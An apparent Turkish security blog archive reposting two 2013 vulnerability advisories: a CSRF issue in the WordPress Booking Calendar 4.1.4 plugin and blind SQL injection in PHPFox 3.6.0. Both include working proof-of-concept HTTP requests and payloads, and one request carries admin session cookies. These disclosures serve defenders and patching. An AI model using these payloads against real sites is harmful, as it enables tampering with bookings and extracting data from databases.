Archive for 10 Ağustos 2013

WordPress Booking Calendar 4.1.4 – CSRF Vulnerability

WordPress Booking Calendar 4.1.4 – versiyonunsa CSRF Açığı bulunmuş olup, Açığın oluşumu ve açık hakkındaki açıklamalar aşağıdaki gibidir.

###########################################################################################
# Exploit Title: CSRF Plugin Booking Calendar 4.1.4 � WordPress
# Date: 04 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Vendor Homepage: http://wpbookingcalendar.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 4.1.4
#
# Greetz: all team WebSecuritydev.
###########################################################################################
CSRF VIA POST.

A�adir nuevo.
http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------------------------------------
ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi%
40gmail.com
~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------

Delete:
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

Post:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions
Content-Length: 104
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


---------------------------

ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------
<< Aprobar Evento >>
URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions
Content-Length: 128
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271;
wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b;
PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

---------------------------------------------------------
ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------

-- 
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
WhiteHat.
*

PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities

PHPFox 3.6.0 (build3) Multiple SQL Injection Açığı bulunmuş olup, Açık bulucunun açığın oluşum yerleri ve açık hakındaki açıklamaları aşağıdaki şekildedir.

------------------------------------------------------------
PHPFox v3.6.0 (build3) Multiple SQL Injection vulnerabilities
------------------------------------------------------------

== Description ==
- Software link: http://www.phpfox.com
- Affected versions: version 3.6.0 (build3) is vulnerable. Other
versions might be affected as well.
- Vulnerability discovered by: Matias Fontanini

== Vulnerabilities ==
When performing POST requests to /user/browse/view_/, the
"search[gender]" and "search[sort_by]" parameters are not correctly
sanitized before being used to construct SQL queries, making them
vulnerable to Blind SQL Injection attacks.

== Proof of concept ==

- For the "search[gender]" parameter, using the condition "1=0" so
that no results are returned:

POST /user/browse/view_/
core[security_token]=0db230b2a8b6755b8cfe60d97fb1a613&search[gender]=2
and 1=0search[from]=&search[to]=&search[country]=&null=1&search[city]=&search[zip]=&search[keyword]=&search[type]=0&search[submit]=Submit&custom[1]=&custom[2]=&custom[3]=&custom[4]=&custom[5]=&custom[6]=&custom[7]=&search[sort]=u.last_login&search[sort_by]=DESC

- The "search[sort_by]" parameter is inserted in a "order by" clause.
Therefore, an attacker could exploit it by making the application sort
the results based on a different criteria, depending on whether the
query was successful:

POST /user/browse/view_/
core[security_token]=0db230b2a8b6755b8cfe60d97fb1a613&search[gender]=2&search[from]=&search[to]=&search[country]=&null=1&search[city]=&search[zip]=&search[keyword]=&search[type]=0&search[submit]=Submit&custom[1]=&custom[2]=&custom[3]=&custom[4]=&custom[5]=&custom[6]=&custom[7]=&search[sort]=u.last_login&search[sort_by]=ASC,(case
when (select 1 from dual) then birthday_search else password end)

== Solution ==
Upgrade the product to the 3.6.0 (build6) version. Note that builds 4
and 5 also contain the vulnerability present in the "search[sort_by]"
parameter, but not the other one.

== Report timeline ==
[2013-07-30] Vulnerability reported to vendor.
[2013-07-30] Developers answered back indicating that an update would
be released soon.
[2013-08-07] PHPFox 3.6.0 (build6) was released, which fixed all of
the issues reported.
[2013-08-07] Public disclosure.